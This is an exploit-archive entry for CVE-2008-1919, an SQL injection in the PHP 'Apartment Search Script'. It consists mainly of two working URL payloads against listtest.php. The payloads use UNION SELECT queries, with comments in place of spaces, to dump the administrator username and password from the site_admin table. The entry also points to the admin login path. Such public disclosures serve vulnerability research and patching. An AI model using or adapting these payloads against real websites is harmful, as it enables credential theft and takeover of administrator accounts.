Apartment Search Script - 'listtest.php' SQL Injection

Author: Crackers_Child
type: webapps
platform: php
port: 
date_added: 2008-04-18  
date_updated: 2016-11-24  
verified: 1  
codes: OSVDB-44533;CVE-2008-1919  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5471.txt  
$ Script        : Apartment Search Script SQL Injection Vulnerability

$ Script Info   : http://www.yourfreeworld.com/script/apartment.asp

$ Script Price  : Only $79

$ Demo          : http://www.downlinegoldmine.com/apartment/

$ Author        : Crackers_Child

$ Contact       : cashr00t@hotmail.com

$ Note          : Erbabi ile vurulduysak sirtimizdan neyleyelim.Bir Yarali Kurt Misali

$ Note          : Her Yanimiz it Tuzagi . . .

$ Username Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,admin%20from%20site_admin/*

$ Password Exp  : www.x.com/script_path/listtest.php?r=-1/**/union/**/select/**/1,password%20from%20site_admin/*

$ Admin Login   : /Site_Admin/

$ Greetz        : Milw0rm.Com & All Peace Warriors

# milw0rm.com [2008-04-19]